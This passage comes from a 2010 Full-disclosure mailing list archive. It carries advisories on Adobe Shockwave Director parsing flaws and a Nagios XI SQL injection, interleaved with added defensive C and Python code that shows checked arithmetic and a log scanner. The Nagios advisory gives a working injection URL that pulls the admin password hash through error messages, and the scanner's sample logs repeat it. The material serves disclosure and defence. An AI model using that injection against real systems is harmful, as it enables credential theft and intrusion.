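 * 0x8000..0xFFFF, so after scaling the offset points before the buffer. */
long offset_sign_extended(const uint8_t *payload)
{
    int16_t w = (int16_t)rd_u16le(payload);
    return (long)w * 4;                     /* "performs arithmetic on it" (scale assumed) */
}

/* Hardened read: the field stays unsigned, and the 4-byte element it
 * addresses must lie entirely inside the payload the chunk carries.
 * On success *out is the byte offset of that element within the payload. */
bool offset_checked(const chunk_t *c, size_t *out)
{
    if (c->size < 2)
        return false;
    size_t off = 2 + (size_t)rd_u16le(c->payload) * 4;   /* cannot be negative */
    if (off > c->size || c->size - off < 4)
        return false;                       /* element would cross the payload end */
    *out = off;
    return true;
}
```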


[Full-disclosure] ZDI-10-163: Adobe Shockwave Director tSAC Chunk Parsing Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
ZDI-10-163: Adobe Shockwave Director tSAC Chunk Parsing Remote Code Execution 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-163
August 24, 2010

-- CVE ID:
CVE-2010-2874

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the Adobe Shockwave Player. User interaction
is required to exploit this vulnerability in that the target must visit
a malicious page or open a malicious file.

The specific flaw exists within the parsing of the undocumented tSAC
RIFF chunk. By setting a specified field within this structure to NULL,
the application fails to initialize an object pointer. This
uninitialized pointer is later called which causes the application to
jump into random heap memory. By crafting the application's memory state
an attacker can utilize this issue to execute arbitrary code under the
context of the user running the browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous




[Full-disclosure] ZDI-10-164: Adobe Shockwave Player Director File FFFFFF88 Record Processing Remote Code Execution Vulnerability

2010-08-24 Thread ZDI Disclosures
ZDI-10-164: Adobe Shockwave Player Director File FF88 Record Processing 
Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-164
August 24, 2010

-- CVE ID:
CVE-2010-2876

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Adobe

-- Affected Products:
Adobe Shockwave Player

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10285. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of the Adobe Shockwave Player. User interaction
is required to exploit this vulnerability in that the target must visit
a malicious page or open a malicious file.

The specific flaw exists within the code responsible for parsing .dir
and .dcr files. The director file format is RIFF based. While parsing an
undocumented record of type 0xFFF8 the process trusts two user
supplied word values when performing arithmetic to calculate a heap
buffer size. By specifying large enough values an integer wrap can
occur. The allocated heap buffer can later be overflowed with user
supplied data. This can be leveraged by attackers to execute remote code
under the context of the user running the browser.

-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:

http://www.adobe.com/support/security/bulletins/apsb10-20.html

-- Disclosure Timeline:
2010-07-20 - Vulnerability reported to vendor
2010-08-24 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous


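The three allocation-size flaws in this thread (the count times element-size allocator of TPTI-10-12, and the 0xFF45 and 0xFFF8 record parsers of ZDI-10-160 and ZDI-10-164) share one pattern, shown here in an added C example that is not Adobe's code or the advisories': the wrapping arithmetic beside a checked version, inside a parser for an assumed [count][elem_size][elements] record layout with 32-bit fields.

```c
/* Added example, not from Adobe or the advisories: checked size
 * arithmetic for a count/element-size record read from an untrusted file. */
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* A parsed table: `count` elements of `elem_size` bytes each. The record
 * layout [count u32 LE][elem_size u32 LE][elements...] is an assumption
 * standing in for the undocumented Director records. */
typedef struct {
    uint32_t count;
    uint32_t elem_size;
    uint8_t *data;          /* owned; exactly count * elem_size bytes */
} table_t;

static uint32_t rd_u32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* The flawed arithmetic, modelled in 32 bits so the wrap is the same on
 * every host: count * elem_size + header is reduced modulo 2^32, so a
 * huge count yields a tiny allocation that later copies overrun. */
uint32_t unchecked_alloc_size(uint32_t count, uint32_t elem_size, uint32_t header)
{
    return count * elem_size + header;
}

/* Hardened form: refuse any combination whose true size does not fit in
 * 32 bits. Returns false on wrap and leaves *out untouched. */
bool checked_alloc_size(uint32_t count, uint32_t elem_size, uint32_t header, uint32_t *out)
{
    if (elem_size != 0 && count > UINT32_MAX / elem_size)
        return false;                      /* count * elem_size would wrap */
    uint32_t bytes = count * elem_size;
    if (bytes > UINT32_MAX - header)
        return false;                      /* adding the header would wrap */
    *out = bytes + header;
    return true;
}

/* Parse one record from an untrusted buffer. Returns 0 on success,
 * -1 if the record is truncated, -2 if the size arithmetic would wrap.
 * The copy length is the same validated value that sized the buffer,
 * never a second length taken from the file (ZDI-10-160's copy used a
 * different size from the one used for the allocation). */
int parse_table_record(const uint8_t *buf, size_t len, table_t *out)
{
    if (len < 8)
        return -1;
    uint32_t count = rd_u32le(buf);
    uint32_t elem_size = rd_u32le(buf + 4);
    uint32_t bytes;
    if (!checked_alloc_size(count, elem_size, 0, &bytes))
        return -2;
    if (bytes > len - 8)
        return -1;                         /* record promises more elements than it carries */
    uint8_t *data = malloc(bytes ? bytes : 1);
    if (!data)
        return -1;
    memcpy(data, buf + 8, bytes);
    out->count = count;
    out->elem_size = elem_size;
    out->data = data;
    return 0;
}
```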


[Full-disclosure] Nagios XI users.php SQL Injection

2010-08-24 Thread Adam Baldwin
 Nagios XI users.php SQL Injection

Advisory Information
Advisory ID: NGENUITY-2010-008
Date published: 8/24/2010

Vulnerability Information
Class: SQL Injection (SQLi)

Software Description
Nagios XI is the commercial / enterprise version of the open source
Nagios project.

Vulnerability Description
Nagios XI prior to version 2009R1.3 is vulnerable to SQL Injection. It
is possible for specially designed queries to extract data via the
database error messages. Authentication and access to users.php is
required. It is possible to also use this SQL injection as a remote XSS
vector as the error message is not properly sanitized.


Technical Description
The records variable on the users.php command is not properly sanitized
and allows for injection of SQL commands. Stacked queries are also
allowed into the postgres database.

http://example.com/nagiosxi/admin/users.php?records=int8((select password from xi_users where username=CHR(110)||CHR(97)||CHR(103)||CHR(105)||CHR(111)||CHR(115)||CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)))&sortby=username&sortorder=asc&search=&page=1

The password hash of the nagiosadmin user would be displayed in the
error message as a result of this query.


Credits
This vulnerability was discovered by Adam Baldwin

Original Advisory:
http://ngenuity-is.com/advisories/2010/aug/24/nagios-xi-usersphp-sql-injection/

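Defender-side example, added here and not part of the advisory above: a small scanner that flags requests to the Nagios XI users.php endpoint whose `records` parameter is anything other than a plain integer, run over constructed access-log lines. It assumes Nagios XI is served under /nagiosxi/ as in the advisory's URL and that the web server writes combined-format logs.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Aug/2010:10:01:02 +0000] "GET /nagiosxi/admin/users.php?records=25&sortby=username&page=1 HTTP/1.1" 200 5120
10.0.0.9 - - [24/Aug/2010:10:02:17 +0000] "GET /nagiosxi/admin/users.php?records=int8((select%20password%20from%20xi_users))&sortby=username HTTP/1.1" 500 812
10.0.0.9 - - [24/Aug/2010:10:03:40 +0000] "GET /nagiosxi/admin/users.php?records=25;%20select%201&page=1 HTTP/1.1" 500 640
10.0.0.7 - - [24/Aug/2010:10:04:01 +0000] "GET /nagiosxi/index.php HTTP/1.1" 200 2048
"""

# Source address, request target and status code from a combined-format line.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})'
)

# Path of the vulnerable script (assumed deployment prefix /nagiosxi/).
USERS_PHP = "/nagiosxi/admin/users.php"


def check_records_param(url):
    """Return a reason string if `records` on users.php is not a plain
    integer, otherwise None. parse_qs percent-decodes the value for us."""
    parts = urlsplit(url)
    if not parts.path.endswith(USERS_PHP):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("records", []):
        value = value.strip()
        if not re.fullmatch(r"\d+", value):
            return "non-integer records value: %r" % value
    return None


def scan_log(text):
    """Return (source_ip, status, reason) for every suspicious users.php hit.
    The advisory notes authentication is required, so a hit identifies a
    logged-in account whose session is worth reviewing, not just an IP."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        src, url, status = m.groups()
        reason = check_records_param(url)
        if reason:
            findings.append((src, int(status), reason))
    return findings
```

Pairing the flagged requests with HTTP 500 responses, as in the constructed lines, is a useful confirmation signal because the advisory's technique relies on database error messages reaching the client.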


[Full-disclosure] iDefense Security Advisory 08.24.10: Adobe Shockwave Player Memory Corruption Vulnerability

2010-08-24 Thread iDefense Labs
iDefense Security Advisory 08.24.10
http://labs.idefense.com/intelligence/vulnerabilities/
Aug 24, 2010

I. BACKGROUND

Adobe Shockwave Player is a popular Web browser plugin. It is available
for multiple Web browsers and platforms, including Windows and MacOS.
Shockwave Player enables Web browsers to display rich multimedia
content in the form of Shockwave videos. For more information, see the
vendor's site found at the following link:

http://get.adobe.com/shockwave

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Adobe
Systems Inc.'s Shockwave Player could allow an attacker to execute
arbitrary code with the privileges of the current user.

The vulnerability takes place during the processing of a tSAC chunk within
an Adobe Director file. A length value is read from the tSAC chunk and
a signed comparison is made against the length value. If the length
value is negative, a memory address is incorrectly calculated and a
null byte is written to the memory address. This condition may lead to
arbitrary code execution.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user viewing the Web page. To exploit
this vulnerability, a targeted user must load a malicious Adobe
Director file created by an attacker. An attacker typically
accomplishes this via social engineering or injecting content into a
compromised, trusted site.

IV. DETECTION

Shockwave Player 11.5.7.609 and earlier versions for Windows and
Macintosh are vulnerable.

V. WORKAROUND

The killbit for the Shockwave Player ActiveX control can be set by
creating the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{233C1507-6A77-46A4-9443-F871F945D258}

Under this key create a new DWORD value called Compatibility Flags and set
its hexadecimal value to 400.

To re-enable Shockwave Player set the Compatibility Flags value to 0.

VI. VENDOR RESPONSE

Adobe has released a fix which addresses this issue. Information about
downloadable vendor updates can be found by clicking on the URLs shown.

http://get.adobe.com/shockwave/

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-2875 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

07/07/2010  Initial Vendor Notification
07/07/2010  Initial Vendor Reply
08/24/2010  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2010 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

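Added illustration of the bug class in the Shockwave advisory above, not iDefense's or Adobe's code and not the real tSAC layout: a 4-byte length field read as a signed integer passes an upper-bound check when negative and yields a write index before the buffer, while an unsigned read with a bound that accounts for the base offset rejects it. The buffer size, base offset and chunk bytes are constructed for the example.

```python
import struct

BUFFER_SIZE = 256  # constructed size of the destination buffer


def unsafe_target_index(length_field, base, limit=BUFFER_SIZE):
    """Model of the flawed check: the field is decoded as signed 32-bit, so a
    negative length satisfies `length > limit` is False and the computed index
    lands before `base` (where the NUL byte would be written). Returns the
    index, or None when the check rejects the chunk."""
    (length,) = struct.unpack("<i", length_field)  # little-endian signed
    if length > limit:
        return None
    return base + length


def safe_target_index(length_field, base, limit=BUFFER_SIZE):
    """Hardened check: decode as unsigned and bound the index itself, not just
    the raw length, so neither wrap-around nor a large value can escape."""
    (length,) = struct.unpack("<I", length_field)  # little-endian unsigned
    if base < 0 or base >= limit or length >= limit - base:
        return None
    return base + length


def in_bounds(index, limit=BUFFER_SIZE):
    """True only when a computed index falls inside the buffer."""
    return index is not None and 0 <= index < limit


def demo():
    """Compare both checks on a constructed negative length and a benign one."""
    negative = struct.pack("<i", -16)   # 0xFFFFFFF0 on the wire
    benign = struct.pack("<I", 100)
    return {
        "unsafe_negative": unsafe_target_index(negative, 8),
        "safe_negative": safe_target_index(negative, 8),
        "unsafe_benign": unsafe_target_index(benign, 8),
        "safe_benign": safe_target_index(benign, 8),
    }
```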